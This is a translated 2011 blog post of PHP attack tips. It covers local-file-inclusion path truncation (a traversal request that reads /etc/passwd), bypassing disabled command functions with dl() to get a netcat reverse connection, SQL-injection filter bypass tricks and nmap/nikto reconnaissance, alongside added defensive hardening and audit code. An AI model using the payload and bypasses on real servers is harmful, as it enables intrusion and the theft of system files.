Author: LengF Time: 2011-06-24
I have done some tests recently and summarized a few of my techniques to help my own learning. If you find them useful, let's go!
Tip 1: Exploiting a File Inclusion vulnerability in PHP
Suppose the code is:
<?php
include($_GET['p'] . ".php");
?>
If allow_url_include = On, there is nothing to discuss. If it is Off, this is an LFI. Some people will say that, apart from including executable files that the system's own source code writes out (the last method mentioned in the article "PHP Security: LFI Vulnerability GetShell Parade"), there is nothing to do. But what if the system is not open source and you do not know how to exploit it, or that system simply offers no such path? What I want to discuss here is the file-reading method. If the code above is saved as lfi.php, we can read files in this way. Take /etc/passwd on Linux as an example; we can use the following request:
lfi.php?p=invalid../../../../../../../../../../etc/passwd/./././././././././. (the "/." segment repeated many hundreds of times)
The number of trailing "/." segments depends on the maximum path length supported by the target system; you can work it out by testing. This lets you read any file type you want, not only .php. Of course, some people will say you can truncate with %00. Sometimes, yes, but as I mentioned in another article, the null-byte truncation bug has been fixed in PHP >= 5.3.4; I only thought of this idea when truncation did not work. LFI has other uses as well; for details, see "PHP Security: LFI Vulnerability GetShell Parade". Other variants also work: for example, a long run of "/" characters that pushes the path past the maximum file path length is discarded in the same way.
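As an added example (not code from the original post), here is the include() pattern from this tip beside a hardened form that refuses traversal and the trailing "/." run before the string reaches the file system; the pages/ directory, the function names and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not code from the original post: the include() from Tip 1
// beside a hardened version. The pages/ directory, the function names and
// the sample inputs are constructed for illustration.

// Vulnerable form, the pattern on the page: the parameter is concatenated with
// ".php" and included unchecked, so "../" and a long trailing "/./." run (which
// pushes the appended ".php" past the maximum path length) both reach the OS.
function include_page_vulnerable(string $p): void
{
    include($p . ".php");
}

// Hardened form: decide which file to include before touching the file system.
function resolve_page(string $base, string $p): ?string
{
    // Allow only a short plain name; this rejects "/", "../", "%00" and the
    // trailing "/." run in one check, independent of the PHP version.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $p)) {
        return null;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $p . '.php');
    // realpath() is false for a missing file; the prefix check also catches a
    // symlink inside pages/ that points back outside it.
    if ($baseReal === false || $target === false
        || strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

function include_page_hardened(string $base, string $p): void
{
    $file = resolve_page($base, $p);
    if ($file === null) {
        http_response_code(404);   // do not reveal why the name was rejected
        return;
    }
    include($file);
}

// Constructed sample inputs; the second is the traversal pattern from the page.
$samples = ['home', '../../../../../../../../../../etc/passwd/' . str_repeat('./', 2000)];
foreach ($samples as $s) {
    $verdict = resolve_page(__DIR__ . '/pages', $s) === null ? 'rejected' : 'allowed ';
    echo $verdict . ': ' . substr($s, 0, 40) . PHP_EOL;
}
```

The first sample is only reported as allowed when pages/home.php actually exists, because realpath() is part of the check.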
Tip 2: Alternative Command Execution Methods
The tips here are about how to execute commands when PHP has disabled the various functions. Sometimes, however, it works out. A friend threw me a shell out of the blue. I looked at it and could not do anything except modify my own web files. I was a bit stuck. However, my friend Tm3yShell7 told me that there is another way to get PHP to execute commands and sent me the PHP function dl(). Haha, I was happy (I don't know how to pretend to be a bucket) and hurried to search Baidu for information.
The premise for using this is enable_dl = On in php.ini (enabled by default in PHP 5.2.5); then we can use our own custom .so (Linux) or .dll (Windows) to execute commands. Many default shells use PHP's system functions to execute commands, such as the most common system, exec, passthru, shell_exec and proc_open. To check whether these are disabled, we can use the following PHP code:
<?php
function showdisablefunctions() {
    // ini_get() returns the comma-separated disable_functions list, or "" if none
    if ($disablefunc = @ini_get("disable_functions")) { return $disablefunc; }
    else { return "NULL"; }
}
echo "Disabled Functions: " . showdisablefunctions();
?>
This function outputs all the disabled functions. If it prints NULL, there are many more options. Why check the disabled PHP functions first? Because it affects how we write the .so or .dll. So it is often necessary to compile and load a .so or .dll module suited to the particular environment. How do we load such a module? Look at the code for dynamic loading (first upload your .so module to the same directory as this file):
dl("php5.so"); // name of the compiled module
As for how to compile the .so file, I am looking through some reference materials in the documentation; of course, the official PHP documentation is the best.
Using this method I got nc to connect back (the shell could not be executed before this was used; the most important thing is that it relies on Perl support, using the nc.pl version). As for the subsequent overflow and privilege checks, it was very BT, but you have to look back at it.
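As an added check (not code from the original post), here is a PHP script a defender can run under the web server's SAPI to audit the settings the two tips rely on; the function names are mine, the directives checked are real PHP ini settings. Since PHP 5.3, dl() is available only in the CLI, CGI and embed SAPIs, so the script tests the function itself as well as enable_dl.

```php
<?php
// Added example, not code from the original post: a read-only audit of the
// php.ini directives that Tip 1 and Tip 2 depend on. The function names are
// hypothetical; every directive checked is a real PHP ini setting.
function ini_on(string $directive): bool
{
    // ini_get() returns "1"/"0"/"" (or false), so normalise to a boolean
    return filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN);
}

function audit_php_hardening(): array
{
    $findings = [];

    // Tip 1: remote includes must be off; local includes still need path checks.
    if (ini_on('allow_url_include')) {
        $findings[] = 'allow_url_include=On: include() can load remote code';
    }

    // Tip 2: dl() loads an arbitrary shared object, bypassing disable_functions.
    // Since PHP 5.3 dl() exists only in the CLI, CGI and embed SAPIs, so both
    // the directive and the function are checked.
    if (ini_on('enable_dl')) {
        $findings[] = 'enable_dl=On: dl() may load attacker-supplied modules';
    }

    // The command-execution functions the post names, plus popen and dl.
    // function_exists() returns false for functions removed by
    // disable_functions, so anything still present is callable by a web shell.
    $expectDisabled = ['system', 'exec', 'passthru', 'shell_exec',
                       'proc_open', 'popen', 'dl'];
    foreach ($expectDisabled as $fn) {
        if (function_exists($fn)) {
            $findings[] = "$fn is callable (not in disable_functions) in SAPI " . PHP_SAPI;
        }
    }

    // open_basedir limits which files include() can reach even when a path
    // check in application code is missed.
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset: include() can reach any readable file';
    }
    return $findings;
}

$findings = audit_php_hardening();
echo $findings ? implode(PHP_EOL, $findings) . PHP_EOL : 'no findings' . PHP_EOL;
```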
Tip 3: Anti-injection Bypass
Anti-injection bypass has always been a topic of interest. The most common ideas are:
1. Mixed upper- and lower-case keywords
2. Encoding the statement, using PHP functions
3. /**/ or /*! */ comments
This is not a full summary; with experience you will understand it through experimentation. Read the official PHP documentation and do not ignore old bugs.
Tip 4: Information Gathering (a side topic)
Strictly speaking this technique does not belong to PHP and applies to any penetration process, so it is an add-on. On Linux, the security testing tools are more intimidating than the Windows ones, but if you are afraid of them you lose a lot of good tools. I often use a few small tools on the Linux platform for powerful information gathering:
1. nmap Scanning
This tool has many options; I mention only one, which is also the most commonly used: nmap -O ip obtains the OS type, open ports and the corresponding services. This collection mainly provides a broader picture for subsequent testing, so that a penetration does not fail because a vulnerability was overlooked.
2. nikto Detection
This tool can often find directories that are hard to find manually. It can scan in several ways over the network, which is better than wwwscan, because wwwscan is dictionary-based, whereas this tool collects any document files on the website, similar to a spider. Of course, it is not a simple URL traversal; it also displays the file content. It is even more powerful when scanning for known vulnerabilities: it gives the complete vulnerability reference number so that no vulnerability is missed.